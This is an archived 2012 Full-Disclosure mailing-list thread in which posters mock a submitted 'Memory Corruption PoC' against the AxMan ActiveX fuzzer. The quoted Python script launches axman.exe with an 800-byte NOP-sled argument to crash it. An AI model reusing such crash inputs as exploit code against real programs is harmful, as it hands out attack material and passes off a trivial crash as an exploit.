[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-Id: <B696C54A-3C8F-42D4-8AB5-33F4A8A3E46E@hammerofgod.com>
Date: Tue, 31 Jul 2012 10:09:06 -0700
From: Thor <thor@...merofgod.com>
To: james@...o-internet.org.uk
Cc: full-disclosure@...ts.grok.org.uk,
full-disclosure-bounces@...ts.grok.org.uk
Subject: Re: AxMan ActiveX fuzzing <== Memory
Corruption PoC
Nope. He's serious. We had an offline discussion (if you want to call it that) where he maintains it is a problem and that other people "appreciate" it.
t
On Jul 31, 2012, at 9:25 AM, James Condron wrote:
> Its a piss take. Of course its a piss take.
>
> Sent using BlackBerry® from Orange
>
> -----Original Message-----
> From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
> Sender: full-disclosure-bounces@...ts.grok.org.uk
> Date: Sun, 29 Jul 2012 15:08:44
> To: <full-disclosure@...ts.grok.org.uk>
> Subject: Re: [Full-disclosure] AxMan ActiveX fuzzing <== Memory Corruption
> PoC
>
> I think ur on vacation now aren't u .... Plus nobody ask u to read my
> post and i am not interested about ur opinion keep it for yourself
>
> On Sat, Jul 28, 2012 at 5:21 PM, kaveh ghaemmaghami
> <kavehghaemmaghami@...glemail.com> wrote:
>> Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
>> Crash : http://imageshack.us/f/217/axman.jpg/
>> Date: July 28, 2012
>> Author: coolkaveh
>> coolkaveh@...ketmail.com
>> Https://twitter.com/coolkaveh
>> Vendor Homepage: http://digitaloffense.net/tools/axman/
>> version : 1.0.0
>> Tested on: windows 7 SP1
>> ========================================================
>> Crash The Exploiter
>> Lame HD Moore fuzzer Memory Corruption
>> By Awsome coolkaveh
>>
>> -------------------------------------------------------------------------------------------------------
>>
>> import os
>> import win32api
>> crash = " Crash The Exploiter "
>> lame=" Lame HD Moore fuzzer Memory corruption "
>> awsome=" By Awsome coolkaveh "
>> print
>> print
>> print
>> print crash
>> print
>> print lame
>> print
>> print awsome
>> print
>> print
>> print
>> print
>> exploit = ("\x90" *800)
>> win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists